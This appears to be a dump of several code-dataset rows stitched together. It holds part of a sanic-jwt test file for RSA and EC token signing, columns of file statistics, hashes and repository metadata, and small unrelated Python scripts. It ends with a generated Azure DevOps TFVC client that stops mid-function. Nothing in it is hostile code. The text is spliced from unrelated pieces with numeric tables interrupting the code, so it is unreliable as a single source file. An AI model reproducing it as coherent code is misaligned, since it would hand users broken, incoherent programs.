_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_rsapss_crypto_from_str(public_rsa_key, private_rsa_key):
app = Sanic()
sanicjwt = Initialize(
app,
authenticate=authenticate,
secret=public_rsa_key.read_text(),
private_key=private_rsa_key.read_text(),
algorithm="PS512",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_ec_crypto_from_str(public_ec_key, private_ec_key):
app = Sanic()
sanicjwt = Initialize(
app,
authenticate=authenticate,
public_key=public_ec_key.read_text(),
private_key=private_ec_key.read_text(),
algorithm="ES512",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_crypto_wrong_keys():
app = Sanic()
Initialize(
app,
authenticate=authenticate,
public_key=str(binascii.hexlify(os.urandom(48)), "utf-8"),
private_key=str(binascii.hexlify(os.urandom(48)), "utf-8"),
algorithm="RS256",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 500
def test_jwt_crypto_very_long_path():
app = Sanic()
n = 16 * 1024
Initialize(
app,
authenticate=authenticate,
public_key=str(binascii.hexlify(os.urandom(n)), "utf-8"),
private_key=str(binascii.hexlify(os.urandom(n)), "utf-8"),
algorithm="RS256",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 500
def test_jwt_crypto_missing_private_key(public_rsa_key):
with pytest.raises(exceptions.RequiredKeysNotFound):
Initialize(
Sanic(),
authenticate=lambda: True,
secret=public_rsa_key,
algorithm="RS256",
)
def test_jwt_crypto_invalid_secret():
with pytest.raises(exceptions.InvalidConfiguration):
Initialize(Sanic(), authenticate=lambda: True, secret=None)
with pytest.raises(exceptions.InvalidConfiguration):
Initialize(Sanic(), authenticate=lambda: True, public_key="")
with pytest.raises(exceptions.InvalidConfiguration):
Initialize(Sanic(), authenticate=lambda: True, secret=" ")
def test_jwt_crypto_invalid_public_key(public_rsa_key, private_rsa_key):
with pytest.raises(exceptions.RequiredKeysNotFound):
Initialize(
Sanic(),
authenticate=lambda: True,
public_key=public_rsa_key / "foo",
private_key=private_rsa_key,
algorithm="RS256",
)
def test_jwt_crypto_invalid_private_key(public_rsa_key, private_rsa_key):
with pytest.raises(exceptions.RequiredKeysNotFound):
Initialize(
Sanic(),
authenticate=lambda: True,
public_key=public_rsa_key,
private_key=private_rsa_key / "bar",
algorithm="RS256",
)
def test_jwt_crypto_invalid_both_keys(public_rsa_key, private_rsa_key):
with pytest.raises(exceptions.RequiredKeysNotFound):
Initialize(
Sanic(),
authenticate=lambda: True,
secret=public_rsa_key / "foo",
private_key=private_rsa_key / "bar",
algorithm="RS256",
)
| 26.236842
| 79
| 0.653042
| 1,358
| 11,964
| 5.498527
| 0.078792
| 0.032141
| 0.033748
| 0.056247
| 0.946297
| 0.9242
| 0.916968
| 0.912682
| 0.898219
| 0.8334
| 0
| 0.012921
| 0.223755
| 11,964
| 455
| 80
| 26.294505
| 0.791106
| 0
| 0
| 0.70679
| 0
| 0
| 0.092528
| 0
| 0
| 0
| 0
| 0
| 0.117284
| 1
| 0.061728
| false
| 0.033951
| 0.024691
| 0
| 0.17284
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6af0db8d87e2163d60e9fc36e461fda738def54
| 212
|
py
|
Python
|
manubot/tests/test_imports.py
|
lasest/manubot
|
7d74055105f3ac19e27fb469779b045a8dbf0acf
|
[
"BSD-2-Clause-Patent"
] | 299
|
2019-02-07T23:40:29.000Z
|
2022-03-29T15:51:33.000Z
|
manubot/tests/test_imports.py
|
Junjun1guo/manubot
|
3ff3000f76dcf82a30694d076a4da95326e3f6ae
|
[
"BSD-2-Clause-Patent"
] | 181
|
2019-02-01T20:44:32.000Z
|
2022-03-22T21:24:16.000Z
|
manubot/tests/test_imports.py
|
Junjun1guo/manubot
|
3ff3000f76dcf82a30694d076a4da95326e3f6ae
|
[
"BSD-2-Clause-Patent"
] | 34
|
2019-05-21T15:03:25.000Z
|
2022-01-17T10:19:24.000Z
|
def test_imports():
    """Smoke-test that the manubot package tree is importable."""
    import importlib

    for module_name in (
        "manubot.cite",
        "manubot.cite.arxiv",
        "manubot.cite.doi",
        "manubot.cite.pubmed",
        "manubot.cite.url",
        "manubot.process.manuscript",
    ):
        importlib.import_module(module_name)
| 21.2
| 37
| 0.726415
| 27
| 212
| 5.666667
| 0.444444
| 0.509804
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.207547
| 212
| 9
| 38
| 23.555556
| 0.910714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| true
| 0
| 0.875
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e6bfe48c990b46309976a50ba0a71dfb309eec1d
| 282
|
py
|
Python
|
Creation/examples/phoros/create.py
|
OmarZOS/semantic-social-indexer
|
5051d4c5679afdef16f6515a231e621fbd02885e
|
[
"MIT"
] | null | null | null |
Creation/examples/phoros/create.py
|
OmarZOS/semantic-social-indexer
|
5051d4c5679afdef16f6515a231e621fbd02885e
|
[
"MIT"
] | 1
|
2022-03-17T23:15:19.000Z
|
2022-03-17T23:15:19.000Z
|
Creation/examples/phoros/create.py
|
OmarZOS/semantic-social-indexer
|
5051d4c5679afdef16f6515a231e621fbd02885e
|
[
"MIT"
] | null | null | null |
# Assemble and persist the ontology for the "phoros" example.
# Each starred import is loaded for its side effects: the modules
# register node/link/social-network classes and their properties on
# the shared target ontology. Import order is preserved deliberately,
# since star imports can shadow earlier names.
from classes.static.nodes.node import *
from classes.static.links.link import *
from classes.static.social_network.social_network import *
from properties.from_source import *
from properties.to_destination import *
from properties.part_of import *
# Write the assembled ontology to disk; TARGET_ONTOLOGY and onto_path
# are presumably provided by one of the starred modules — TODO confirm.
TARGET_ONTOLOGY.save(onto_path)
| 31.333333
| 58
| 0.833333
| 40
| 282
| 5.7
| 0.525
| 0.219298
| 0.223684
| 0.201754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092199
| 282
| 9
| 59
| 31.333333
| 0.890625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e6c8ca3f7d174003ba2cc822724bb28cc248a84d
| 126
|
py
|
Python
|
geral/livro_data_science_do_zero/chapter5/test_mode.py
|
flaviogf/Cursos
|
2b120dbcd24a907121f58482fdcdfa01b164872c
|
[
"MIT"
] | 2
|
2021-02-20T23:50:07.000Z
|
2021-08-15T03:04:35.000Z
|
geral/livro_data_science_do_zero/chapter5/test_mode.py
|
flaviogf/Cursos
|
2b120dbcd24a907121f58482fdcdfa01b164872c
|
[
"MIT"
] | 18
|
2019-08-07T02:33:00.000Z
|
2021-03-18T22:52:38.000Z
|
geral/livro_data_science_do_zero/chapter5/test_mode.py
|
flaviogf/Cursos
|
2b120dbcd24a907121f58482fdcdfa01b164872c
|
[
"MIT"
] | 2
|
2020-09-28T13:00:09.000Z
|
2021-12-30T12:21:08.000Z
|
from example01 import mode, num_friends
def test_should_mode_return_100_and_49():
    """The sample num_friends data is bimodal: 100 and 49 are tied."""
    result = mode(num_friends)
    assert result == [100, 49]
| 21
| 41
| 0.769841
| 20
| 126
| 4.45
| 0.7
| 0.157303
| 0.314607
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 0.142857
| 126
| 5
| 42
| 25.2
| 0.712963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e6d410dceec255f941753c38b62345b8266b1c82
| 41,425
|
py
|
Python
|
vsts/vsts/tfvc/v4_0/tfvc_client.py
|
dhilmathy/azure-devops-python-api
|
d16026911f93361becb52d2f1c124d5c3e8a82e7
|
[
"MIT"
] | null | null | null |
vsts/vsts/tfvc/v4_0/tfvc_client.py
|
dhilmathy/azure-devops-python-api
|
d16026911f93361becb52d2f1c124d5c3e8a82e7
|
[
"MIT"
] | 37
|
2020-04-27T07:45:19.000Z
|
2021-04-05T07:27:15.000Z
|
vsts/vsts/tfvc/v4_0/tfvc_client.py
|
dhilmathy/azure-devops-python-api
|
d16026911f93361becb52d2f1c124d5c3e8a82e7
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...vss_client import VssClient
from . import models
class TfvcClient(VssClient):
"""Tfvc
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
def __init__(self, base_url=None, creds=None):
# Initialize the base VSS client with the service URL and credentials.
super(TfvcClient, self).__init__(base_url, creds)
# Collect every class defined in the generated models module so the
# msrest serializer/deserializer can resolve model type names at runtime.
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
# Well-known resource-area GUID for the TFVC service (class attribute).
resource_area_identifier = '8aa40520-446d-40e6-89f6-9c9f9ce44c48'
def get_branch(self, path, project=None, include_parent=None, include_children=None):
"""GetBranch.
Get a single branch hierarchy at the given path with parents or children (if specified)
:param str path:
:param str project: Project ID or project name
:param bool include_parent:
:param bool include_children:
:rtype: :class:`<TfvcBranch> <tfvc.v4_0.models.TfvcBranch>`
"""
# Route values become URL path segments; None-valued arguments are omitted.
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
# Optional arguments are sent as query-string parameters.
query_parameters = {}
if path is not None:
query_parameters['path'] = self._serialize.query('path', path, 'str')
if include_parent is not None:
query_parameters['includeParent'] = self._serialize.query('include_parent', include_parent, 'bool')
if include_children is not None:
query_parameters['includeChildren'] = self._serialize.query('include_children', include_children, 'bool')
# location_id is the well-known GUID of the TFVC branches endpoint.
response = self._send(http_method='GET',
location_id='bc1f417e-239d-42e7-85e1-76e80cb2d6eb',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('TfvcBranch', response)
def get_branches(self, project=None, include_parent=None, include_children=None, include_deleted=None, include_links=None):
"""GetBranches.
Get a collection of branch roots -- first-level children, branches with no parents
:param str project: Project ID or project name
:param bool include_parent:
:param bool include_children:
:param bool include_deleted:
:param bool include_links:
:rtype: [TfvcBranch]
"""
# Route values become URL path segments; None-valued arguments are omitted.
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
# Optional flags are passed through as query-string parameters.
query_parameters = {}
if include_parent is not None:
query_parameters['includeParent'] = self._serialize.query('include_parent', include_parent, 'bool')
if include_children is not None:
query_parameters['includeChildren'] = self._serialize.query('include_children', include_children, 'bool')
if include_deleted is not None:
query_parameters['includeDeleted'] = self._serialize.query('include_deleted', include_deleted, 'bool')
if include_links is not None:
query_parameters['includeLinks'] = self._serialize.query('include_links', include_links, 'bool')
response = self._send(http_method='GET',
location_id='bc1f417e-239d-42e7-85e1-76e80cb2d6eb',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
# The wrapped JSON collection is unwrapped before list deserialization.
return self._deserialize('[TfvcBranch]', self._unwrap_collection(response))
def get_branch_refs(self, scope_path, project=None, include_deleted=None, include_links=None):
"""GetBranchRefs.
Get branch hierarchies below the specified scopePath
:param str scope_path:
:param str project: Project ID or project name
:param bool include_deleted:
:param bool include_links:
:rtype: [TfvcBranchRef]
"""
# Route values become URL path segments; None-valued arguments are omitted.
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if include_deleted is not None:
query_parameters['includeDeleted'] = self._serialize.query('include_deleted', include_deleted, 'bool')
if include_links is not None:
query_parameters['includeLinks'] = self._serialize.query('include_links', include_links, 'bool')
response = self._send(http_method='GET',
location_id='bc1f417e-239d-42e7-85e1-76e80cb2d6eb',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
# The wrapped JSON collection is unwrapped before list deserialization.
return self._deserialize('[TfvcBranchRef]', self._unwrap_collection(response))
def get_changeset_changes(self, id=None, skip=None, top=None):
"""GetChangesetChanges.
Retrieve Tfvc changes for a given changeset
:param int id:
:param int skip:
:param int top:
:rtype: [TfvcChange]
"""
route_values = {}
if id is not None:
route_values['id'] = self._serialize.url('id', id, 'int')
# $skip / $top implement server-side paging of the change list.
query_parameters = {}
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
response = self._send(http_method='GET',
location_id='f32b86f2-15b9-4fe6-81b1-6f8938617ee5',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcChange]', self._unwrap_collection(response))
def create_changeset(self, changeset, project=None):
"""CreateChangeset.
Create a new changeset.
:param :class:`<TfvcChangeset> <tfvc.v4_0.models.TfvcChangeset>` changeset:
:param str project: Project ID or project name
:rtype: :class:`<TfvcChangesetRef> <tfvc.v4_0.models.TfvcChangesetRef>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
# The changeset model is serialized into the POST request body.
content = self._serialize.body(changeset, 'TfvcChangeset')
response = self._send(http_method='POST',
location_id='0bc8f0a4-6bfb-42a9-ba84-139da7b99c49',
version='4.0',
route_values=route_values,
content=content)
return self._deserialize('TfvcChangesetRef', response)
def get_changeset(self, id, project=None, max_change_count=None, include_details=None, include_work_items=None, max_comment_length=None, include_source_rename=None, skip=None, top=None, orderby=None, search_criteria=None):
"""GetChangeset.
Retrieve a Tfvc Changeset
:param int id:
:param str project: Project ID or project name
:param int max_change_count:
:param bool include_details:
:param bool include_work_items:
:param int max_comment_length:
:param bool include_source_rename:
:param int skip:
:param int top:
:param str orderby:
:param :class:`<TfvcChangesetSearchCriteria> <tfvc.v4_0.models.TfvcChangesetSearchCriteria>` search_criteria:
:rtype: :class:`<TfvcChangeset> <tfvc.v4_0.models.TfvcChangeset>`
"""
# Route values become URL path segments; None-valued arguments are omitted.
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if id is not None:
route_values['id'] = self._serialize.url('id', id, 'int')
query_parameters = {}
if max_change_count is not None:
query_parameters['maxChangeCount'] = self._serialize.query('max_change_count', max_change_count, 'int')
if include_details is not None:
query_parameters['includeDetails'] = self._serialize.query('include_details', include_details, 'bool')
if include_work_items is not None:
query_parameters['includeWorkItems'] = self._serialize.query('include_work_items', include_work_items, 'bool')
if max_comment_length is not None:
query_parameters['maxCommentLength'] = self._serialize.query('max_comment_length', max_comment_length, 'int')
if include_source_rename is not None:
query_parameters['includeSourceRename'] = self._serialize.query('include_source_rename', include_source_rename, 'bool')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query('orderby', orderby, 'str')
# The nested search-criteria object is flattened into dotted query
# parameters (searchCriteria.<field>) rather than serialized as a body.
if search_criteria is not None:
if search_criteria.item_path is not None:
query_parameters['searchCriteria.itemPath'] = search_criteria.item_path
if search_criteria.author is not None:
query_parameters['searchCriteria.author'] = search_criteria.author
if search_criteria.from_date is not None:
query_parameters['searchCriteria.fromDate'] = search_criteria.from_date
if search_criteria.to_date is not None:
query_parameters['searchCriteria.toDate'] = search_criteria.to_date
if search_criteria.from_id is not None:
query_parameters['searchCriteria.fromId'] = search_criteria.from_id
if search_criteria.to_id is not None:
query_parameters['searchCriteria.toId'] = search_criteria.to_id
if search_criteria.follow_renames is not None:
query_parameters['searchCriteria.followRenames'] = search_criteria.follow_renames
if search_criteria.include_links is not None:
query_parameters['searchCriteria.includeLinks'] = search_criteria.include_links
response = self._send(http_method='GET',
location_id='0bc8f0a4-6bfb-42a9-ba84-139da7b99c49',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('TfvcChangeset', response)
def get_changesets(self, project=None, max_comment_length=None, skip=None, top=None, orderby=None, search_criteria=None):
"""GetChangesets.
Retrieve Tfvc changesets Note: This is a new version of the GetChangesets API that doesn't expose the unneeded queryParams present in the 1.0 version of the API.
:param str project: Project ID or project name
:param int max_comment_length:
:param int skip:
:param int top:
:param str orderby:
:param :class:`<TfvcChangesetSearchCriteria> <tfvc.v4_0.models.TfvcChangesetSearchCriteria>` search_criteria:
:rtype: [TfvcChangesetRef]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if max_comment_length is not None:
query_parameters['maxCommentLength'] = self._serialize.query('max_comment_length', max_comment_length, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query('orderby', orderby, 'str')
# The nested search-criteria object is flattened into dotted query
# parameters (searchCriteria.<field>), mirroring get_changeset above.
if search_criteria is not None:
if search_criteria.item_path is not None:
query_parameters['searchCriteria.itemPath'] = search_criteria.item_path
if search_criteria.author is not None:
query_parameters['searchCriteria.author'] = search_criteria.author
if search_criteria.from_date is not None:
query_parameters['searchCriteria.fromDate'] = search_criteria.from_date
if search_criteria.to_date is not None:
query_parameters['searchCriteria.toDate'] = search_criteria.to_date
if search_criteria.from_id is not None:
query_parameters['searchCriteria.fromId'] = search_criteria.from_id
if search_criteria.to_id is not None:
query_parameters['searchCriteria.toId'] = search_criteria.to_id
if search_criteria.follow_renames is not None:
query_parameters['searchCriteria.followRenames'] = search_criteria.follow_renames
if search_criteria.include_links is not None:
query_parameters['searchCriteria.includeLinks'] = search_criteria.include_links
response = self._send(http_method='GET',
location_id='0bc8f0a4-6bfb-42a9-ba84-139da7b99c49',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcChangesetRef]', self._unwrap_collection(response))
def get_batched_changesets(self, changesets_request_data):
"""GetBatchedChangesets.
:param :class:`<TfvcChangesetsRequestData> <tfvc.v4_0.models.TfvcChangesetsRequestData>` changesets_request_data:
:rtype: [TfvcChangesetRef]
"""
# The request-data model is serialized as the POST body; this endpoint
# takes no route or query parameters.
content = self._serialize.body(changesets_request_data, 'TfvcChangesetsRequestData')
response = self._send(http_method='POST',
location_id='b7e7c173-803c-4fea-9ec8-31ee35c5502a',
version='4.0',
content=content)
return self._deserialize('[TfvcChangesetRef]', self._unwrap_collection(response))
def get_changeset_work_items(self, id=None):
"""GetChangesetWorkItems.
:param int id:
:rtype: [AssociatedWorkItem]
"""
# The changeset id is the only routing input; no query parameters.
route_values = {}
if id is not None:
route_values['id'] = self._serialize.url('id', id, 'int')
response = self._send(http_method='GET',
location_id='64ae0bea-1d71-47c9-a9e5-fe73f5ea0ff4',
version='4.0',
route_values=route_values)
return self._deserialize('[AssociatedWorkItem]', self._unwrap_collection(response))
def get_items_batch(self, item_request_data, project=None):
"""GetItemsBatch.
Post for retrieving a set of items given a list of paths or a long path. Allows for specifying the recursionLevel and version descriptors for each path.
:param :class:`<TfvcItemRequestData> <tfvc.v4_0.models.TfvcItemRequestData>` item_request_data:
:param str project: Project ID or project name
:rtype: [[TfvcItem]]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
# The item-request model is serialized as the POST body.
content = self._serialize.body(item_request_data, 'TfvcItemRequestData')
response = self._send(http_method='POST',
location_id='fe6f827b-5f64-480f-b8af-1eca3b80e833',
version='4.0',
route_values=route_values,
content=content)
# Note the nested-list return type: one item list per requested path.
return self._deserialize('[[TfvcItem]]', self._unwrap_collection(response))
def get_items_batch_zip(self, item_request_data, project=None, **kwargs):
"""GetItemsBatchZip.
Post for retrieving a set of items given a list of paths or a long path. Allows for specifying the recursionLevel and version descriptors for each path.
:param :class:`<TfvcItemRequestData> <tfvc.v4_0.models.TfvcItemRequestData>` item_request_data:
:param str project: Project ID or project name
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
content = self._serialize.body(item_request_data, 'TfvcItemRequestData')
# Requesting application/zip makes the server return a zip archive
# instead of a JSON item listing.
response = self._send(http_method='POST',
location_id='fe6f827b-5f64-480f-b8af-1eca3b80e833',
version='4.0',
route_values=route_values,
content=content,
accept_media_type='application/zip')
# An optional `callback` kwarg observes download progress while streaming.
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_item(self, path, project=None, file_name=None, download=None, scope_path=None, recursion_level=None, version_descriptor=None):
"""GetItem.
Get Item Metadata and/or Content for a single item. The download parameter is to indicate whether the content should be available as a download or just sent as a stream in the response. Doesn't apply to zipped content which is always returned as a download.
:param str path:
:param str project: Project ID or project name
:param str file_name:
:param bool download:
:param str scope_path:
:param str recursion_level:
:param :class:`<TfvcVersionDescriptor> <tfvc.v4_0.models.TfvcVersionDescriptor>` version_descriptor:
:rtype: :class:`<TfvcItem> <tfvc.v4_0.models.TfvcItem>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if path is not None:
query_parameters['path'] = self._serialize.query('path', path, 'str')
if file_name is not None:
query_parameters['fileName'] = self._serialize.query('file_name', file_name, 'str')
if download is not None:
query_parameters['download'] = self._serialize.query('download', download, 'bool')
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if recursion_level is not None:
query_parameters['recursionLevel'] = self._serialize.query('recursion_level', recursion_level, 'str')
# The nested version descriptor is flattened into dotted query
# parameters (versionDescriptor.<field>).
if version_descriptor is not None:
if version_descriptor.version_option is not None:
query_parameters['versionDescriptor.versionOption'] = version_descriptor.version_option
if version_descriptor.version_type is not None:
query_parameters['versionDescriptor.versionType'] = version_descriptor.version_type
if version_descriptor.version is not None:
query_parameters['versionDescriptor.version'] = version_descriptor.version
response = self._send(http_method='GET',
location_id='ba9fc436-9a38-4578-89d6-e4f3241f5040',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('TfvcItem', response)
def get_item_content(self, path, project=None, file_name=None, download=None, scope_path=None, recursion_level=None, version_descriptor=None, **kwargs):
"""GetItemContent.
Get Item Metadata and/or Content for a single item. The download parameter is to indicate whether the content should be available as a download or just sent as a stream in the response. Doesn't apply to zipped content which is always returned as a download.
:param str path:
:param str project: Project ID or project name
:param str file_name:
:param bool download:
:param str scope_path:
:param str recursion_level:
:param :class:`<TfvcVersionDescriptor> <tfvc.v4_0.models.TfvcVersionDescriptor>` version_descriptor:
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if path is not None:
query_parameters['path'] = self._serialize.query('path', path, 'str')
if file_name is not None:
query_parameters['fileName'] = self._serialize.query('file_name', file_name, 'str')
if download is not None:
query_parameters['download'] = self._serialize.query('download', download, 'bool')
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if recursion_level is not None:
query_parameters['recursionLevel'] = self._serialize.query('recursion_level', recursion_level, 'str')
# The nested version descriptor is flattened into dotted query parameters.
if version_descriptor is not None:
if version_descriptor.version_option is not None:
query_parameters['versionDescriptor.versionOption'] = version_descriptor.version_option
if version_descriptor.version_type is not None:
query_parameters['versionDescriptor.versionType'] = version_descriptor.version_type
if version_descriptor.version is not None:
query_parameters['versionDescriptor.version'] = version_descriptor.version
# application/octet-stream requests raw file content rather than JSON metadata.
response = self._send(http_method='GET',
location_id='ba9fc436-9a38-4578-89d6-e4f3241f5040',
version='4.0',
route_values=route_values,
query_parameters=query_parameters,
accept_media_type='application/octet-stream')
# An optional `callback` kwarg observes download progress while streaming.
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_items(self, project=None, scope_path=None, recursion_level=None, include_links=None, version_descriptor=None):
"""GetItems.
Get a list of Tfvc items
:param str project: Project ID or project name
:param str scope_path:
:param str recursion_level:
:param bool include_links:
:param :class:`<TfvcVersionDescriptor> <tfvc.v4_0.models.TfvcVersionDescriptor>` version_descriptor:
:rtype: [TfvcItem]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if recursion_level is not None:
query_parameters['recursionLevel'] = self._serialize.query('recursion_level', recursion_level, 'str')
if include_links is not None:
query_parameters['includeLinks'] = self._serialize.query('include_links', include_links, 'bool')
# The nested version descriptor is flattened into dotted query parameters.
if version_descriptor is not None:
if version_descriptor.version_option is not None:
query_parameters['versionDescriptor.versionOption'] = version_descriptor.version_option
if version_descriptor.version_type is not None:
query_parameters['versionDescriptor.versionType'] = version_descriptor.version_type
if version_descriptor.version is not None:
query_parameters['versionDescriptor.version'] = version_descriptor.version
response = self._send(http_method='GET',
location_id='ba9fc436-9a38-4578-89d6-e4f3241f5040',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcItem]', self._unwrap_collection(response))
def get_item_text(self, path, project=None, file_name=None, download=None, scope_path=None, recursion_level=None, version_descriptor=None, **kwargs):
"""GetItemText.
Get Item Metadata and/or Content for a single item. The download parameter is to indicate whether the content should be available as a download or just sent as a stream in the response. Doesn't apply to zipped content which is always returned as a download.
:param str path:
:param str project: Project ID or project name
:param str file_name:
:param bool download:
:param str scope_path:
:param str recursion_level:
:param :class:`<TfvcVersionDescriptor> <tfvc.v4_0.models.TfvcVersionDescriptor>` version_descriptor:
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if path is not None:
query_parameters['path'] = self._serialize.query('path', path, 'str')
if file_name is not None:
query_parameters['fileName'] = self._serialize.query('file_name', file_name, 'str')
if download is not None:
query_parameters['download'] = self._serialize.query('download', download, 'bool')
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if recursion_level is not None:
query_parameters['recursionLevel'] = self._serialize.query('recursion_level', recursion_level, 'str')
# The nested version descriptor is flattened into dotted query parameters.
if version_descriptor is not None:
if version_descriptor.version_option is not None:
query_parameters['versionDescriptor.versionOption'] = version_descriptor.version_option
if version_descriptor.version_type is not None:
query_parameters['versionDescriptor.versionType'] = version_descriptor.version_type
if version_descriptor.version is not None:
query_parameters['versionDescriptor.version'] = version_descriptor.version
# text/plain requests the item content as plain text.
response = self._send(http_method='GET',
location_id='ba9fc436-9a38-4578-89d6-e4f3241f5040',
version='4.0',
route_values=route_values,
query_parameters=query_parameters,
accept_media_type='text/plain')
# An optional `callback` kwarg observes download progress while streaming.
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_item_zip(self, path, project=None, file_name=None, download=None, scope_path=None, recursion_level=None, version_descriptor=None, **kwargs):
"""GetItemZip.
Get Item Metadata and/or Content for a single item. The download parameter is to indicate whether the content should be available as a download or just sent as a stream in the response. Doesn't apply to zipped content which is always returned as a download.
:param str path:
:param str project: Project ID or project name
:param str file_name:
:param bool download:
:param str scope_path:
:param str recursion_level:
:param :class:`<TfvcVersionDescriptor> <tfvc.v4_0.models.TfvcVersionDescriptor>` version_descriptor:
:rtype: object
"""
route_values = {}
if project is not None:
